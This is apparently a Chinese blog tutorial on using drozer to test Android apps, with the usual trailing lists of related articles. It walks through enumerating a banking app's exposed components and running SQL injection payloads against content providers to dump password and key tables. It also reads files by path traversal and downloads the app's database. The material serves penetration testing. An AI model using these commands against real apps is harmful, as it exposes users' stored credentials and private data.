工具:drozer,源码地址:https://github.com/mwrlabs/drozer/

1.准备工作

1.运行 drozer-agent.apk
2.选择 embedded–enable
3.设置端口转发:adb forward tcp:31415 tcp:31415
运行:
drozer.bat console connect
进入dz>界面

2.开始测试

  1. 列出详细 APP 信息:

dz> run app.package.info -a com.bankcomm.tokyo

  1. 查看 APP 的配置信息

dz> run app.package.manifest com.bankcomm.tokyo

3.分析是否存在攻击攻击点

dz> run app.package.attacksurface com.bankcomm.tokyo

4.查看暴露的 provider 权限

dz> run app.provider.info -a com.bankcomm.tokyo

5.获取 Activity 信息

dz> run app.activity.info -a com.bankcomm.tokyo

6.检测 SQL 注入

dz> run scanner.provider.injection -a com.bankcomm.tokyo

7.检测目录遍历

dz> run scanner.provider.traversal -a com.bankcomm.tokyo

8.获取所有可访问的 Uri

dz> run scanner.provider.finduris -a com.bankcomm.tokyo

9.SQL 注入

dz> run app.provider.query content://com.bankcomm.tokyo.DBContentProvider/Passwords/

列出所有表

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM SQLITE_MASTER WHERE type='table';--"

获取单表(如 Key)的数据

 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM Key;--"

10.读取文件系统下的文件

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

11.下载数据库文件到本地

dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db

drozer 测试总结相关推荐

  1. drozer与adb工具的安装与使用

    drozer:链接: https://pan.baidu.com/s/1skTJdgh 密码: wah1 adb:链接: https://pan.baidu.com/s/1gfpIkuv 密码: n8 ...

  2. Android测试(二)——drozer使用

    drozer启动: 1)首先在模拟 器或者安卓设备上开启drozer; 2)然后打开adb,转发端口: adb forward tcp:31415 tcp:31415 3)在电脑上开启drozer: ...

  3. 软件测试——系统测试总结报告模板

    软件测试--系统测试总结报告模板 目录 编写目的 背景 用户群 定义 测试对象 测试阶段 测试工具 参考资料 测试概要 进度回顾 测试执行 测试用例 测试环境 网络拓扑 测试结果 Bug趋势图 问题类 ...

  4. Drozer快速使用指南

    1.简介: Drozer是一款用于测试android应用程序漏洞的安全评估工具,能够发现多种类型的安全的漏洞,免费版本的相关资源下载地址: https://www.mwrinfosecurity.co ...

  5. 性能测试总结(三)--工具选型篇

    性能测试总结(三)--工具选型篇 本篇文章主要简单总结下性能测试工具的原理以及如何选型.性能测试和功能测试不同,性能测试的执行是基本功能的重复和并发,需要模拟多用户,在性能测试执行时需要监控指标参数, ...

  6. 20175305张天钰 《java程序设计》第四周课下测试总结

    第四周课下测试总结 错题 某方法在父类的访问权限是public,则子类重写时级别可以是protected. A .true B .false 正确答案:B 解析:书P122:子类不允许降低方法的访问权 ...

  7. 入门级----测试的执行、环境的搭建、每日构建、测试记录和跟踪、回归测试、测试总结和报告...

    测试用例的准备,都是为了执行测试准备的. 测试环境的搭建 (1)测试数据:有些测试需要使用大批量的数据,例如容量测试.压力测试等.根据产品的具体测试要求,可能需要在数据库表插入大量的数据,准备大量的文 ...

  8. android冒烟测试自动化,安卓自动化测试总结(五)——测试结果发送及内容展示...

    安卓自动化测试总结(五)--测试结果发送及内容展示 使用jenkins自动构建并完成自动化测试后,如果想看测试结果,都需要打开jenkins构建地址,找到对应的构建及构建结果.这样做很麻烦,关心自动化 ...

  9. C++对象内存布局测试总结

    C++对象内存布局测试总结 http://hi.baidu.com/����/blog/item/826d38ff13c32e3a5d6008e8.html 上文是半年前对虚函数.虚拟继承的理解.可能 ...

最新文章

  1. 从0到1,苏宁API网关的演进之路
  2. 如何在MARKDOWN编辑器设置表格的宽度?
  3. [Java] 基本資料包裝類別 Wrapper Classes
  4. armv8/armv9页表属性(page descriptor)的详细介绍
  5. Codeforces 982 C. Cut 'em all! 图的遍历
  6. 6.变量的使用.rs
  7. 源码与tarball套件管理程序笔记摘录
  8. 用JQuery操作元素的style属性
  9. 【算法】剑指 Offer 29. 顺时针打印矩阵
  10. Hyperledger Fabric 命令整理
  11. HTTP/2之服务器推送(Server Push)最佳实践
  12. DIY远程控制开关(tiny6410+LED+yeelink+curl)
  13. X射线辩材--CT原理
  14. 信息收集工具之hping安装和使用
  15. 有哪些好用的论文检索网站?
  16. 华三H3C路由器配置FTP服务并使用电脑连接ftp传输文件
  17. 第十七章、程序管理与 SELinux 初探
  18. css3 图片阴影、翘边效果
  19. Camera Tuning 常见缩写
  20. SSO 轻量级实现指南(原生 Java 实现):SSO Client 部分

热门文章

  1. 交换机简单配置 SSH
  2. 用计算机程序解决问题的核心是什么,1.1使用计算机解决问题的一般过程
  3. 【面试题】数据库索引及B树、B+树详解
  4. 路由表中preference 和metric的含义
  5. 2021届秋招大厂高频算法题汇总
  6. 2021-12-20 WPF上位机 120-三菱PLC协议之读写方法流程解析
  7. M5(项目)-01-尚硅谷谷粒商城项目分布式基础篇开发文档
  8. 从微软官网下载VisualStudio离线包
  9. HTML+JS中网页跳转的写法
  10. origin刻度消失_Origin中坐标轴被误删了,怎么恢复坐标轴及刻度